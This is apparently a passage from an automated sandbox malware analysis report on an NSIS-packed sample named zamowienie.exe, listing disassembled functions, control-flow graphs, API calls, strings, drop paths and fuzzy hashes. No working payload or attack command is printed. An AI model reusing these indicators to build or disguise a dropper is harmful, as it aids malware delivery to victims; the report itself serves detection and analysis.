371->373 372->303 374 404376-4043cd call 40445e GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 372->374 373->298 374->298 379 4043cf-4043e7 ShowWindow call 4044aa 374->379 379->303
                                                                                                                                              APIs
                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
                                                                                                                                              • ShowWindow.USER32(?), ref: 00403FC0
                                                                                                                                              • GetWindowLongA.USER32(?,?), ref: 00403FD2
                                                                                                                                              • ShowWindow.USER32(?,?), ref: 00403FEB
                                                                                                                                              • DestroyWindow.USER32 ref: 00403FFF
                                                                                                                                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00404018
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00404037
                                                                                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00404052
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 004040FD
                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404107
                                                                                                                                              • SetClassLongA.USER32(?,000000F2,?), ref: 00404121
                                                                                                                                              • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00404172
                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404218
                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404239
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404266
                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040427C
                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00404283
                                                                                                                                              • SendMessageA.USER32(?,?,00000000,?), ref: 0040429B
                                                                                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 004042AE
                                                                                                                                              • lstrlenA.KERNEL32(00420950,?,00420950,00000000), ref: 004042D8
                                                                                                                                              • SetWindowTextA.USER32(?,00420950), ref: 004042E7
                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040441B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                              • String ID: PB
                                                                                                                                              • API String ID: 121052019-3672992855
                                                                                                                                              • Opcode ID: c56a5ccc02b7f5f0acd46eae67d0002f0b7f8efa6a4c77154bcaedd95f9cc79a
                                                                                                                                              • Instruction ID: 7376357f09764d014885a6d200a66e315d4f85d41a2c318c142f082606f7750f
                                                                                                                                              • Opcode Fuzzy Hash: c56a5ccc02b7f5f0acd46eae67d0002f0b7f8efa6a4c77154bcaedd95f9cc79a
                                                                                                                                              • Instruction Fuzzy Hash: D4C1D4B1600204ABDB20AF61EE45E2A3AB9FB95715F40053EF741B61F1CB395842DB6D
                                                                                                                                              Function 00403BC7 Relevance: 49.2, APIs: 13, Strings: 15, Instructions: 215stringregistryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 382 403bc7-403bdf call 4067e6 385 403be1-403bf1 call 40631c 382->385 386 403bf3-403c24 call 4062a5 382->386 395 403c47-403c70 call 403e8c call 405e3e 385->395 390 403c26-403c37 call 4062a5 386->390 391 403c3c-403c42 lstrcatA 386->391 390->391 391->395 400 403c76-403c7b 395->400 401 403cf7-403cff call 405e3e 395->401 400->401 402 403c7d-403ca1 call 4062a5 400->402 406 403d01-403d08 call 406451 401->406 407 403d0d-403d32 LoadImageA 401->407 402->401 409 403ca3-403ca5 402->409 406->407 411 403db3-403dbb call 40140b 407->411 412 403d34-403d64 RegisterClassA 407->412 413 403cb6-403cc2 lstrlenA 409->413 414 403ca7-403cb4 call 405d7b 409->414 425 403dc5-403dd0 call 403e8c 411->425 426 403dbd-403dc0 411->426 415 403e82 412->415 416 403d6a-403dae SystemParametersInfoA CreateWindowExA 412->416 420 403cc4-403cd2 lstrcmpiA 413->420 421 403cea-403cf2 call 405d50 call 4063be 413->421 414->413 419 403e84-403e8b 415->419 416->411 420->421 424 403cd4-403cde GetFileAttributesA 420->424 421->401 428 403ce0-403ce2 424->428 429 403ce4-403ce5 call 405d97 424->429 435 403dd6-403df0 ShowWindow call 406778 425->435 436 403e59-403e61 call 4055d4 425->436 426->419 428->421 428->429 429->421 441 403df2-403df7 call 406778 435->441 442 403dfc-403e0e GetClassInfoA 435->442 443 403e63-403e69 436->443 444 403e7b-403e7d call 40140b 436->444 441->442 447 403e10-403e20 GetClassInfoA RegisterClassA 442->447 448 403e26-403e49 DialogBoxParamA call 40140b 442->448 443->426 449 403e6f-403e76 call 40140b 443->449 444->415 447->448 452 403e4e-403e57 call 403b17 448->452 449->426 452->419
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004067E6: GetModuleHandleA.KERNEL32(?,00000000,?,00403633,?), ref: 004067F8
                                                                                                                                                • Part of subcall function 004067E6: GetProcAddress.KERNEL32(00000000,?), ref: 00406813
                                                                                                                                              • lstrcatA.KERNEL32(1033,00420950,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420950,00000000,00000002,75923410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\zamowienie.exe",0000000A,?), ref: 00403C42
                                                                                                                                              • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen,1033,00420950,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420950,00000000,00000002,75923410), ref: 00403CB7
                                                                                                                                              • lstrcmpiA.KERNEL32(?,.exe), ref: 00403CCA
                                                                                                                                              • GetFileAttributesA.KERNEL32(Call,?,"C:\Users\user\Desktop\zamowienie.exe",0000000A,?), ref: 00403CD5
                                                                                                                                              • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen), ref: 00403D1E
                                                                                                                                                • Part of subcall function 0040631C: wsprintfA.USER32 ref: 00406329
                                                                                                                                              • RegisterClassA.USER32(00423AE0), ref: 00403D5B
                                                                                                                                              • SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 00403D73
                                                                                                                                              • CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
                                                                                                                                              • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\zamowienie.exe",0000000A,?), ref: 00403DDE
                                                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit20A,00423AE0), ref: 00403E0A
                                                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit,00423AE0), ref: 00403E17
                                                                                                                                              • RegisterClassA.USER32(00423AE0), ref: 00403E20
                                                                                                                                              • DialogBoxParamA.USER32(?,00000000,00403F64,00000000), ref: 00403E3F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                              • String ID: "C:\Users\user\Desktop\zamowienie.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen$Call$Control Panel\Desktop\ResourceLocale$PB$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$:B
                                                                                                                                              • API String ID: 1975747703-2541314629
                                                                                                                                              • Opcode ID: 620cab51be79f5210b3e00d0671a564d17e24c2031f51a8d19595ed5b95b23c8
                                                                                                                                              • Instruction ID: 15572397f31390b0026957f06d9246276b85993f85f6909d539d0c183b2e965b
                                                                                                                                              • Opcode Fuzzy Hash: 620cab51be79f5210b3e00d0671a564d17e24c2031f51a8d19595ed5b95b23c8
                                                                                                                                              • Instruction Fuzzy Hash: 7B61A470740200AEE620AF659D46F273E6CEB8474AF40413FF945B62E2DB7D9D028A6D
                                                                                                                                              Function 00402F81 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 204memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 456 402f81-402fcf GetTickCount GetModuleFileNameA call 405f51 459 402fd1-402fd6 456->459 460 402fdb-403009 call 4063be call 405d97 call 4063be GetFileSize 456->460 461 40321b-40321f 459->461 468 4030f4-403102 call 402ee2 460->468 469 40300f 460->469 476 4031d3-4031d8 468->476 477 403108-40310b 468->477 471 403014-40302b 469->471 473 40302d 471->473 474 40302f-403038 call 403493 471->474 473->474 481 40303e-403045 474->481 482 40318f-403197 call 402ee2 474->482 476->461 479 403137-403183 GlobalAlloc call 40690b call 405f80 CreateFileA 477->479 480 40310d-403125 call 4034a9 call 403493 477->480 507 403185-40318a 479->507 508 403199-4031c9 call 4034a9 call 403222 479->508 480->476 503 40312b-403131 480->503 485 4030c1-4030c5 481->485 486 403047-40305b call 405f0c 481->486 482->476 490 4030c7-4030ce call 402ee2 485->490 491 4030cf-4030d5 485->491 486->491 505 40305d-403064 486->505 490->491 498 4030e4-4030ec 491->498 499 4030d7-4030e1 call 40689d 491->499 498->471 506 4030f2 498->506 499->498 503->476 503->479 505->491 510 403066-40306d 505->510 506->468 507->461 516 4031ce-4031d1 508->516 510->491 512 40306f-403076 510->512 512->491 514 403078-40307f 512->514 514->491 517 403081-4030a1 514->517 516->476 518 4031da-4031eb 516->518 517->476 519 4030a7-4030ab 517->519 520 4031f3-4031f8 518->520 521 4031ed 518->521 522 4030b3-4030bb 519->522 523 4030ad-4030b1 519->523 524 4031f9-4031ff 520->524 521->520 522->491 525 4030bd-4030bf 522->525 523->506 523->522 524->524 526 403201-403219 call 405f0c 524->526 525->491 526->461
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402F95
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\zamowienie.exe,00000400), ref: 00402FB1
                                                                                                                                                • Part of subcall function 00405F51: GetFileAttributesA.KERNELBASE(00000003,00402FC4,C:\Users\user\Desktop\zamowienie.exe,80000000,00000003), ref: 00405F55
                                                                                                                                                • Part of subcall function 00405F51: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F77
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\zamowienie.exe,C:\Users\user\Desktop\zamowienie.exe,80000000,00000003), ref: 00402FFA
                                                                                                                                              • GlobalAlloc.KERNELBASE(?,0000000A), ref: 0040313C
                                                                                                                                              Strings
                                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403185
                                                                                                                                              • Error launching installer, xrefs: 00402FD1
                                                                                                                                              • C:\Users\user\Desktop, xrefs: 00402FDC, 00402FE1, 00402FE7
                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F8B, 00403154
                                                                                                                                              • Null, xrefs: 00403078
                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 004031D3
                                                                                                                                              • "C:\Users\user\Desktop\zamowienie.exe", xrefs: 00402F8A
                                                                                                                                              • C:\Users\user\Desktop\zamowienie.exe, xrefs: 00402F9B, 00402FAA, 00402FBE, 00402FDB
                                                                                                                                              • Inst, xrefs: 00403066
                                                                                                                                              • soft, xrefs: 0040306F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                              • String ID: "C:\Users\user\Desktop\zamowienie.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\zamowienie.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                              • API String ID: 2803837635-2402691860
                                                                                                                                              • Opcode ID: b635acffbff0ba399469ee59140565eb1758717ff91dfd29eb8e6c25685f07b8
                                                                                                                                              • Instruction ID: ed4fe0058f68e5356621a91c3f32a15a2e9546f38920a89811823236489433fc
                                                                                                                                              • Opcode Fuzzy Hash: b635acffbff0ba399469ee59140565eb1758717ff91dfd29eb8e6c25685f07b8
                                                                                                                                              • Instruction Fuzzy Hash: 7171E571A01218ABDB20DFA5DD85BAA7BACEB44355F20403BF910B72C1C73C9E458B5D
                                                                                                                                              Function 00406451 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208stringCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 529 406451-40645c 530 40645e-40646d 529->530 531 40646f-406484 529->531 530->531 532 406695-406699 531->532 533 40648a-406495 531->533 534 4064a7-4064b1 532->534 535 40669f-4066a9 532->535 533->532 536 40649b-4064a2 533->536 534->535 539 4064b7-4064be 534->539 537 4066b4-4066b5 535->537 538 4066ab-4066af call 4063be 535->538 536->532 538->537 541 4064c4-4064fa 539->541 542 406688 539->542 543 406500-40650a 541->543 544 406632-406635 541->544 545 406692-406694 542->545 546 40668a-406690 542->546 549 406527 543->549 550 40650c-406515 543->550 547 406665-406668 544->547 548 406637-40663a 544->548 545->532 546->532 553 406676-406686 lstrlenA 547->553 554 40666a-406671 call 406451 547->554 551 40664a-406656 call 4063be 548->551 552 40663c-406648 call 40631c 548->552 556 40652e-406536 549->556 550->549 555 406517-40651a 550->555 566 40665b-406661 551->566 552->566 553->532 554->553 555->549 562 40651c-40651f 555->562 557 406538 556->557 558 40653f-406541 556->558 557->558 563 406543-40655e call 4062a5 558->563 564 406578-40657b 558->564 562->549 567 406521-406525 562->567 572 406563-406566 563->572 570 40657d-406589 GetSystemDirectoryA 564->570 571 40658e-406591 564->571 566->553 569 406663 566->569 567->556 573 40662a-406630 call 4066b8 569->573 574 406614-406617 570->574 575 4065a2-4065a5 571->575 576 406593-40659f GetWindowsDirectoryA 571->576 577 406619-40661d 572->577 578 40656c-406573 call 406451 572->578 573->553 574->573 574->577 575->574 580 4065a7-4065c5 575->580 576->575 577->573 582 40661f-406625 lstrcatA 577->582 578->574 584 4065c7-4065ca 580->584 585 4065dc-4065f4 call 4067e6 580->585 582->573 584->585 588 4065cc-4065d0 584->588 592 4065f6-406609 SHGetPathFromIDListA CoTaskMemFree 585->592 593 40660b-406612 585->593 590 4065d8-4065da 588->590 590->574 590->585 592->574 592->593 593->574 593->580
                                                                                                                                              APIs
                                                                                                                                              • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406583
                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,00420130,00000000,0040553A,00420130,00000000,00000000), ref: 00406599
                                                                                                                                              • SHGetPathFromIDListA.SHELL32(00000000,Call,?,0040553A,00000007,?,00420130,00000000,0040553A,00420130,00000000), ref: 004065F8
                                                                                                                                              • CoTaskMemFree.OLE32(00000000,?,0040553A,00000007,?,00420130,00000000,0040553A,00420130,00000000), ref: 00406601
                                                                                                                                              • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,00420130,00000000,0040553A,00420130,00000000), ref: 00406625
                                                                                                                                              • lstrlenA.KERNEL32(Call,?,00420130,00000000,0040553A,00420130,00000000,00000000,00000000,00000000), ref: 00406677
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                              • API String ID: 4024019347-1230650788
                                                                                                                                              • Opcode ID: d611f6242e431796b8a803629c39fee4ff87036cc87cc7ede1ba42b97eef57d3
                                                                                                                                              • Instruction ID: 77335b3f073876605690a2972cfc5f6a29f7ec0c49114c5d1bda13f4a7b380f8
                                                                                                                                              • Opcode Fuzzy Hash: d611f6242e431796b8a803629c39fee4ff87036cc87cc7ede1ba42b97eef57d3
                                                                                                                                              • Instruction Fuzzy Hash: B7612670A00215AEDB209F64DC8177E7BA8AB55718F16853FE803BB2C1C67E4961CB6D
                                                                                                                                              Function 0040177E Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 663 40177e-4017a1 call 402c5e call 405dbd 668 4017a3-4017a9 call 4063be 663->668 669 4017ab-4017bd call 4063be call 405d50 lstrcatA 663->669 674 4017c2-4017c8 call 4066b8 668->674 669->674 679 4017cd-4017d1 674->679 680 4017d3-4017dd call 406751 679->680 681 401804-401807 679->681 688 4017ef-401801 680->688 689 4017df-4017ed CompareFileTime 680->689 683 401809-40180a call 405f2c 681->683 684 40180f-40182b call 405f51 681->684 683->684 691 4018a3-4018cc call 405502 call 403222 684->691 692 40182d-401830 684->692 688->681 689->688 706 4018d4-4018e0 SetFileTime 691->706 707 4018ce-4018d2 691->707 694 401832-401874 call 4063be * 2 call 406451 call 4063be call 405ad4 692->694 695 401885-40188f call 405502 692->695 694->679 728 40187a-40187b 694->728 704 401898-40189e 695->704 708 402af3 704->708 710 4018e6-4018f1 CloseHandle 706->710 707->706 707->710 712 402af5-402af9 708->712 713 4018f7-4018fa 710->713 714 402aea-402aed 710->714 716 4018fc-40190d call 406451 lstrcatA 713->716 717 40190f-401912 call 406451 713->717 714->708 723 401917-4023af 716->723 717->723 726 4023b4-4023b9 723->726 727 4023af call 405ad4 723->727 726->712 727->726 728->704 729 40187d-40187e 728->729 729->695
                                                                                                                                              APIs
                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218,00000000,00000000,00000031), ref: 004017BD
                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218,00000000,00000000,00000031), ref: 004017E7
                                                                                                                                                • Part of subcall function 004063BE: lstrcpynA.KERNEL32(?,?,00000400,00403694,Noncomplacency,NSIS Error,?,?,0000000A,?), ref: 004063CB
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000,?), ref: 0040553B
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(Y/@,00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000), ref: 0040554B
                                                                                                                                                • Part of subcall function 00405502: lstrcatA.KERNEL32(00420130,0040A130,Y/@,00420130,00000000,00000000,00000000), ref: 0040555E
                                                                                                                                                • Part of subcall function 00405502: SetWindowTextA.USER32(00420130,00420130), ref: 00405570
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405596
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004055B0
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001013,?,00000000), ref: 004055BE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsz31BB.tmp$C:\Users\user\AppData\Local\Temp\nsz31BB.tmp\System.dll$C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218$Call
                                                                                                                                              • API String ID: 1941528284-1401610635
                                                                                                                                              • Opcode ID: 67e320951d3f6cc1fc444d15d2eb5cc36c9cd03edc5ce869828ed39ac8aff2df
                                                                                                                                              • Instruction ID: 8062edde81af7af1f8e18069ba582bba02230208e58e154462dd7249cc838d9e
                                                                                                                                              • Opcode Fuzzy Hash: 67e320951d3f6cc1fc444d15d2eb5cc36c9cd03edc5ce869828ed39ac8aff2df
                                                                                                                                              • Instruction Fuzzy Hash: 3041F931A00515BACF10BBA5CC45EEF3669EF0132CB61823BF512F11E1DA7C8A518BAD
                                                                                                                                              Function 00406778 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 730 406778-406798 GetSystemDirectoryA 731 40679a 730->731 732 40679c-40679e 730->732 731->732 733 4067a0-4067a8 732->733 734 4067ae-4067b0 732->734 733->734 735 4067aa-4067ac 733->735 736 4067b1-4067e3 wsprintfA LoadLibraryExA 734->736 735->736
                                                                                                                                              APIs
                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040678F
                                                                                                                                              • wsprintfA.USER32 ref: 004067C8
                                                                                                                                              • LoadLibraryExA.KERNELBASE(?,00000000,?), ref: 004067DC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                              • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                              • API String ID: 2200240437-4240819195
                                                                                                                                              • Opcode ID: b64ca7e6414ee6bbf5da50448a3027ef8d4ba463d4e3383e6ca23f3e6ee4dffe
                                                                                                                                              • Instruction ID: d351ad90a744857e6050e4ee6da8d250d2110caa805cc7bd6d518ce1ee186bf2
                                                                                                                                              • Opcode Fuzzy Hash: b64ca7e6414ee6bbf5da50448a3027ef8d4ba463d4e3383e6ca23f3e6ee4dffe
                                                                                                                                              • Instruction Fuzzy Hash: 40F0FC7061020967DF159B64DD0DFEA375CAB08308F14047AA146E21D1E978D5358B69
